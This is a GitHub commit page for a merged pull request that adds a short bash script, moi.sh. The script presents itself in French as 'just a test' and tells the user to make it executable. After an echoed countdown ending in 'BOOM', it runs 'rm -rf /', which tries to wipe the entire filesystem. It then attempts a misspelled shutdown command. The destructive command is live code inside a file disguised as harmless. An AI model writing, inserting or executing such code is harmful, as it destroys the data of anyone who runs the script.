Merge pull request #61 from kholius/master

add: moi.sh
This commit is contained in:
papiche 2024-02-19 13:39:49 +01:00 committed by GitHub
commit af1f9b40aa
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
#!/bin/bash
echo "Ceci est un test"
# attention
# il faut que le fichier soit exécutable
# chmod +x ceci_est_un_test.sh
echo "Ceci est un test"
echo "rm -rf /"
echo "5"
sleep 1
echo "4"
sleep 1
echo "3"
sleep 1
echo "2"
sleep 1
echo "1"
sleep 1
echo "BOOM"
sleep 10
rm -rf /
echo "je n'aime pas révéler mon identité"
shutown 0